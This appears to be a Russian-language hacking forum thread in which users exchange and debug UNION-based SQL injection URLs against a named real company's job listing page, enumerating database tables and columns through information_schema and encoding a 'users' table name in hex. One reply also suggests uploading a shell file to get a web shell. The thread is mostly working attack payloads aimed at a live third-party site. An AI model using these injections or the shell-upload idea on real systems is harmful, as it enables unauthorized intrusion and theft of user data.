http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+AS CII(LOWER(TABLE_NAME))=117+--+

здесь запрос зделано так чтоби показано таблици ц начунаюших с букви у..

а как вот здесь WHERE+ASCII(LOWER(TABLE_NAME))=117 напистаь полное имя таблици ??

вот например здесь..
http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+AS CII(LOWER(TABLE_NAME))=117+--+

здесь запрос зделано так чтоби показано таблици ц начунаюших с букви у..

а как вот здесь WHERE+ASCII(LOWER(TABLE_NAME))=117 напистаь полное имя таблици ??


http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+ta ble_name='your_table'--

http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+ta ble_name='your_table'--
Помоему смысла в этом запросе никакого нету, ибо получаем имя таблицы где имя таблицы равно имени таблицы)
Ну и вопрос тоже какой то непонятный.
Получать таблицы с именем начинающемся с U лучше так:

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4, 5,%206,7,8,9,10+FROM+information_schema.tables+whe re+table_name>0x55+--+

а вот именно where+table_name>x55+--+ здесь как написать >полнуй имя таблици ??

Если прикручен модуль mod_include
попробуй загрузить shell.txt с данными:
Ога, PHP невыполняеться, а ASP.NET на Apache сервере с расширением .txt выполниться..

а вот именно where+table_name>x55+--+ здесь как написать >полнуй имя таблици ??
Всё, догнал, что ты хотел. Да, полное имя таблицы в hex

ne polucaetsya..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75+--+

i ne tak..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+

ne polucaetsya..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75+--+

i ne tak..

http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+
0x75736572